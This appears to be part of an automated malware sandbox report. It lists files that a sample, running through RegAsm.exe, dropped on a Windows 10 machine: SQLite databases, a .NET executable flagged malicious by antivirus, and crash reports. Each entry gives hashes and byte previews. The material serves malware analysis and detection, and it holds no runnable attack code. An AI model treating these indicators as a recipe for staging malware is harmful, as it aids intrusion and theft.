                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                          Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                          MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                          SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                          SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                          SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\IIIDAKJDHJKFHIEBFCGH

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                          Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\JEHDHIEGIIIDHIDHDHJJ

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\JJJEGCGDGH.exe

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):423840
                                                                                                                                                                                                                                          Entropy (8bit):7.988954975057422
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:hQq9JI/vWhNOAE2wMUZ0iR4HHW02AEPzYhDU9qcEO:5JXfOATt3202AHhD5ct
                                                                                                                                                                                                                                          MD5:237AF39F8B579AAD0205F6174BB96239
                                                                                                                                                                                                                                          SHA1:7AAD40783BE4F593A2883B6A66F66F5F624D4550
                                                                                                                                                                                                                                          SHA-256:836CE1411F26919F8FB95548D03C2F4DFD658FC525DFE21C7BE8ED65F81A5957
                                                                                                                                                                                                                                          SHA-512:DF46993A2029B22CBC88B289398265494C5A8F54EA803E15B7B12F4A7BC98152DF298916D341E3C3590329B35A806788AE294BAE2E6832F2A2AC426D0145504D
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................. ...........>... ...@....@.. ....................................`..................................>..S....@..B...........xQ..(&...`......`=............................................... ............... ..H............text........ ... .................. ..`.rsrc...B....@......."..............@..@.reloc.......`.......&..............@..B.................>......H.......@+.. ............................................................B,..Je.8..*.......Xf..3..Zm...v.$:...r......X...M..6'4..,.O.T...!..B..C.|....[.{2.y.d?1d2.m.......U5A9.3.B.[l.t..P3f.A*.y.z$.[Yi.............[..v..\..Bq..g.^.....pd....{....t.}.y*..[P....v.y.H. ..@.'2.^..4.h..7!.O.w.Jx...i....v...?.G.6^...`.q8..NZ..-.T...u...W1z.....K.._...*..7.-...H.<fz(..7..-..@.{.%.x.B.#.."...S4.,N.........iO......#T......jN.F.A......h.j..p..."&.xU-...`....4....

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GoogleUpdater.ex_7abe3d18ad39973c1cb1f1d8f5bc60f9c6dbe03c_db37d895_77a45578-a373-4bd9-8b77-0fd307d066ed\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.0319491628579163
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:N1AL6cKC/MP70BU/Ka6hUGzuiFzZ24IO86:NOGcKSMQBU/KaPGzuiFzY4IO86
                                                                                                                                                                                                                                          MD5:2AEB84C3BDC11E45B59ACB78064BFEDF
                                                                                                                                                                                                                                          SHA1:FA3F0F5E860D1F496344CEC0CD55F66BB600920B
                                                                                                                                                                                                                                          SHA-256:1BFB4C05FDA4094BDA678648E5533FFB29DA94A9487DB262F4C96B63855A0D18
                                                                                                                                                                                                                                          SHA-512:93A5C39E2418C0A12FA1D4F6479AB3E3A2107C5C75D36358589BCD095728D81A21A525768056710AA317772460A684C90451C8BE27AD4E4EEB816F43E515EDF0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.4.6.5.8.5.7.6.3.3.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.4.6.5.8.7.1.2.2.6.9.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.a.4.5.5.7.8.-.a.3.7.3.-.4.b.d.9.-.8.b.7.7.-.0.f.d.3.0.7.d.0.6.6.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.d.2.3.d.5.3.-.b.4.6.b.-.4.6.5.b.-.9.3.1.7.-.2.6.f.e.5.0.6.9.1.8.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.4.-.0.0.0.1.-.0.0.1.5.-.e.8.c.d.-.e.c.9.e.c.8.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.f.5.b.3.d.3.9.a.4.7.1.6.8.a.a.c.7.7.6.1.3.7.5.8.2.c.b.b.e.6.a.9.4.a.9.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bfe39a947477cce1fe59d4b2218f25464652fafc_73dbdf77_909cbae0-1737-46b4-a593-2b858333e565\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.0291287126709117
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:EDuF0shdbqiHPQqqUUyx9OxQXIDcQvc6QcEVcw3cE/X+BHUHZopAnQHdE7HeS9+Y:X5RqizP70BU/aa6RUGzuiFzZ24IO8Hn
                                                                                                                                                                                                                                          MD5:07685950DD57475F75ECB38FA3BC7753
                                                                                                                                                                                                                                          SHA1:694780768AEFD24B11C652A6FDBB854C35E98597
                                                                                                                                                                                                                                          SHA-256:92A592D2C11A674E8318BA9ED029722BF2A51D2CE7AE17A2AD45EE73B22A0A51
                                                                                                                                                                                                                                          SHA-512:614AFF69488D0679DEBDDA70FA420656E8DE77227A709C0E26237831BB42622388408637D8E22BEBE74A022128D471EF34815A3191C6CF5BE0AF7190DED37AB8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.4.6.5.7.6.6.1.3.6.0.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.4.6.5.7.7.2.0.7.3.4.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.c.b.a.e.0.-.1.7.3.7.-.4.6.b.4.-.a.5.9.3.-.2.b.8.5.8.3.3.3.e.5.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.e.5.3.5.d.9.-.1.4.6.9.-.4.5.4.e.-.a.5.c.2.-.8.f.8.5.6.1.9.f.8.0.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.b.0.-.0.0.0.1.-.0.0.1.5.-.f.1.9.6.-.0.5.9.a.c.8.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.f.5.b.3.d.3.9.a.4.7.1.6.8.a.a.c.7.7.6.1.3.7.5.8.2.c.b.b.e.6.a.9.4.a.9.c.2.2.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bfe39a947477cce1fe59d4b2218f25464652fafc_73dbdf77_a743617e-bfdc-4a00-bc91-b9c08d3718bb\Report.wer

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                          Entropy (8bit):1.0290824601658313
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:xW+tqwzP70BU/aaiRUGzuiFzZ24IO8Hn:M+tqwzQBU/aaXGzuiFzY4IO8H
                                                                                                                                                                                                                                          MD5:A92ED95A9EE5E9BE2576B5FD45E5DE8B
                                                                                                                                                                                                                                          SHA1:3AB8E485CF21FF337D2F8A5CE38AD8A62DF992E0
                                                                                                                                                                                                                                          SHA-256:67F6497F57BD387D197C5185F6A76A17E9EB6AD5CE17533A2B83E97C9B988637
                                                                                                                                                                                                                                          SHA-512:D2CF2584AB56B8F9D326F6D130B35150BD1B6088C867028809DFE271DCE159CC44C53F20BF7AB91A31CC4E54B0A5ABA12324704D361C3B93BF2785DA082FB8D1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.4.6.5.9.4.4.0.7.9.4.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.4.6.5.9.5.2.8.2.9.4.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.4.3.6.1.7.e.-.b.f.d.c.-.4.a.0.0.-.b.c.9.1.-.b.9.c.0.8.d.3.7.1.8.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.3.9.c.5.b.c.-.7.a.2.0.-.4.2.2.f.-.b.e.0.1.-.b.2.3.9.7.2.a.7.a.4.5.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.4.-.0.0.0.1.-.0.0.1.5.-.f.8.8.9.-.6.d.a.4.c.8.1.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.3.d.f.5.b.3.d.3.9.a.4.7.1.6.8.a.a.c.7.7.6.1.3.7.5.8.2.c.b.b.e.6.a.9.4.a.9.c.2.2.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C9A.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Oct 2 12:43:06 2024, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):266887
                                                                                                                                                                                                                                          Entropy (8bit):3.784162386965169
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:RrdTkne/xtTCWCZhaECvIvpFCD3M/CfGXEqThlmvXuBojR3nUWF5ZpN4uE2aOZSb:RrdTXWGxXGXEYy3nUWF4uEqZy4LTgOu
                                                                                                                                                                                                                                          MD5:3EEB32AFFC6E7B359A5D336CA6CF8881
                                                                                                                                                                                                                                          SHA1:215A4A20B9D39573E5CACE3E1AAF0A5903A6E390
                                                                                                                                                                                                                                          SHA-256:71B305055E9703151AAD50C44943A9296C3CFF65146993C971320F4232B32DC8
                                                                                                                                                                                                                                          SHA-512:35B5A3C5F78B12018987D725F225470BF2E125EDF2E4D50F1C00631BB6DBD06C8B7955A124C68AD57C0C4BAF251A60B747FACEA4BE432D978E7A5C35E5F1D434
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MDMP..a..... ........?.f........................D...........$...........d'...P..........`.......8...........T...........x............... ............ ..............................................................................eJ....... ......GenuineIntel............T............?.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FC7.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8418
                                                                                                                                                                                                                                          Entropy (8bit):3.690376552324856
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJSa6J6Y2DXASU9s5gmfZYfprj89bnBsf7LVNm:R6lXJv6J6YaASU9s5gmfCmn6f7i
                                                                                                                                                                                                                                          MD5:F95850FB00DD574EBC9FFFC2CD3C503A
                                                                                                                                                                                                                                          SHA1:2EC784EE6C769CC5E9C81A906AA2D17BFE71F499
                                                                                                                                                                                                                                          SHA-256:D4502F4F5A07821DCFE392F60E8DB60387988CF84C655A81AA1D950D2AC34067
                                                                                                                                                                                                                                          SHA-512:8063168AAA257F7CA9753E517B65AD4634AAABA497AC660A16ABD24D955F397B6FDBAFDD65053F8BB94E14352A2DA9A5C793D5A2DBF055EA48A9C3FEE0458B46
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.6.0.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2036.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4766
                                                                                                                                                                                                                                          Entropy (8bit):4.4709387231563325
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs3tJg77aI91KWpW8VYdYPYm8M4JFEO7F9in+q8vPEOt11DcWd:uIjf3HI7Tr7VgYSJ+LKcKdcWd
                                                                                                                                                                                                                                          MD5:FA111CDF644FB8340B02C5695016837F
                                                                                                                                                                                                                                          SHA1:36F8640F76852E18BA135087E4624884D6DB0A50
                                                                                                                                                                                                                                          SHA-256:CDD97F80A66294DFAF300A1B4FDE613080D7B34345C0336D36CCDD9EEC38292E
                                                                                                                                                                                                                                          SHA-512:8A137A36EFC3B08956D46D8AB38CA9F5A8B567A45AD4302A8822EA98AA8D5299A02E0B2726B5364B8D72A4925C4C562FAF23AC92B3D9F4F395A81D46579CFD24
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="525825" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E2C.tmp.dmp

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Wed Oct 2 12:43:14 2024, 0x1205a4 type
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):266923
                                                                                                                                                                                                                                          Entropy (8bit):3.7648438580982386
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:TTfMZ8OUcYXtTtxvpGCDTM/CiGCPYa1WvLuBojRb9WLzpN4uE2aOqtSVXMCsLTgw:TTf+nqRxPm2awdbar4uEqwygLTgax5
                                                                                                                                                                                                                                          MD5:E5B7C69492E9371786E7139F2ED307EF
                                                                                                                                                                                                                                          SHA1:363428A11AE24D32C2C7C5C613CD557D2D7BF688
                                                                                                                                                                                                                                          SHA-256:452C77A78EED2067CD2E8F8C3666E4200F1E9F58ECDDB3A1B6F121633BF7BEE4
                                                                                                                                                                                                                                          SHA-512:0A5B2F20EC8AA614A7748E7FD272B1E19270A4B72EF81266CA3F755707A87AECCB39B52BF304757BE63A7AFF4031475355018DA5DF667091640611B93C36D560
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:MDMP..a..... ........?.f........................D...........$............&..zP..........`.......8...........T...........P...[........... ............ ..............................................................................eJ....... ......GenuineIntel............T............?.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FD3.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8404
                                                                                                                                                                                                                                          Entropy (8bit):3.694698708320585
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJDN606Y2DOSU9VgmfZXfprO89bEusf0Asm:R6lXJp606YjSU9VgmfpVEtfH
                                                                                                                                                                                                                                          MD5:0292BB346CAAE1EAD50BFCD173C9DDAC
                                                                                                                                                                                                                                          SHA1:05BCB929978AFCF2542575C3BDB47958BE3C8E39
                                                                                                                                                                                                                                          SHA-256:5881298E25CBEF02EA9390641371720BC7DB51F1E88ABF72F66E26D6C408FAD0
                                                                                                                                                                                                                                          SHA-512:B5BA658A405D16A5CB2603DF03A23046DC276018460E98709A3975AF808CA71541DDE6F21770E4D26CD43262AE4AF37DA3FBA589546518206AD668240A84F6B0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.0.8.<./.P.i.

                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4002.tmp.xml

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
